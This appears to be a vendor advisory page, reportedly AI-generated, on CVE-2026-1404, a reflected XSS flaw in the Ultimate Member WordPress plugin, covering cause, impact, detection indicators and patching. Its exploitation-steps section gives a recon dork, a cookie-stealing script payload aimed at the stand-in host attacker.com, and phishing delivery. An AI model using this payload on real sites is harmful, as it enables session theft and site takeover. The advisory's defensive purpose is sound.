CVE-2026-1404
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-1404 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin for WordPress. It affects all versions up to and including 2.11.1, stemming from insufficient input sanitization and output escaping on filter parameters such as filter_first_name. Unauthenticated attackers can inject arbitrary web scripts into pages that execute when a victim clicks a crafted link. It carries a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE, Vulners).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting), specifically the reflected variant (CAPEC-591). The plugin fails to properly sanitize user-supplied input in filter parameters (e.g., filter_first_name) passed via HTTP GET/POST requests, and does not escape the values before rendering them in the HTML response. An unauthenticated attacker crafts a malicious URL containing a JavaScript payload in one of these filter parameters; when a logged-in user (such as an administrator) clicks the link, the script executes in their browser context. A Nuclei detection template was submitted to the ProjectDiscovery community repository, indicating the attack surface is well-understood (Nuclei Templates PR, Infinitsec).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, potentially leading to session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. Because the scope is changed (S:C in CVSS), the injected script can affect resources beyond the vulnerable component itself, such as the victim's browser environment and any data accessible within it. If the victim is a privileged WordPress user (e.g., administrator), the attacker could leverage the XSS to install malicious plugins, create rogue admin accounts, or perform site takeover actions (Red Hat CVE, Sucuri Blog).

Exploitability

The vulnerability requires no authentication and has low attack complexity, though it does require user interaction (a victim must click a crafted link). The EPSS score is approximately 0.065% (0.000650), indicating a relatively low but non-negligible probability of exploitation in the wild. A Nuclei template pull request was submitted to ProjectDiscovery's community repository, and a GitHub exploit reference has been indexed by Vulners, suggesting public PoC or detection tooling exists (Nuclei Templates PR, Vulners Exploit). No CISA KEV listing or confirmed in-the-wild exploitation campaigns have been reported as of the available data.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Ultimate Member plugin version ≤ 2.11.1 using tools like WPScan, Shodan, or Google dorks (e.g., inurl:/wp-content/plugins/ultimate-member).
  2. Identify vulnerable parameter: Locate a page that renders the Ultimate Member member directory or similar filter-enabled view, which exposes parameters such as filter_first_name.
  3. Craft malicious URL: Construct a URL targeting the vulnerable filter parameter with an XSS payload, for example: https://target.com/members/?filter_first_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
  4. Deliver the payload: Send the crafted URL to a target user (e.g., a WordPress administrator) via phishing email, social engineering, or embedded in a forum post/comment.
  5. Achieve objective: When the victim clicks the link and the page loads, the injected script executes in their browser, enabling session cookie theft, credential harvesting, or performing privileged actions on the WordPress site on the victim's behalf (Infinitsec, Nuclei Templates PR).

Indicators of compromise

  • Network: HTTP requests to WordPress member directory pages (e.g., /members/) containing URL-encoded script tags or JavaScript event handlers in filter parameters such as filter_first_name, filter_last_name, or similar.
  • Logs: WordPress or web server access logs showing GET/POST requests with parameters containing <script>, javascript:, onerror=, onload=, or other XSS indicators in filter fields.
  • Logs: Outbound requests from victim browsers to unknown external domains shortly after accessing a member directory page, potentially indicating cookie exfiltration.
  • File System: Unexpected new WordPress admin accounts or newly installed plugins following a potential successful XSS-to-admin-action chain.

Mitigation and workarounds

Users should update the Ultimate Member plugin to a version beyond 2.11.1 that includes a patch for this vulnerability; check the official WordPress plugin repository for the latest release. As a temporary workaround, site administrators can restrict access to member directory pages to authenticated users only, reducing the attack surface by limiting who can be targeted with crafted links. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help detect and block exploitation attempts while a patch is applied (Sucuri Blog, Red Hat CVE).

Community reactions

Sucuri included CVE-2026-1404 in their February 2026 vulnerability patch roundup, highlighting it as one of several WordPress plugin issues requiring attention (Sucuri Blog). A Nuclei template was submitted to the ProjectDiscovery community repository, reflecting security researcher interest in building automated detection for this vulnerability (Nuclei Templates PR). Overall community reaction appears measured given the Medium severity rating and the requirement for user interaction.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management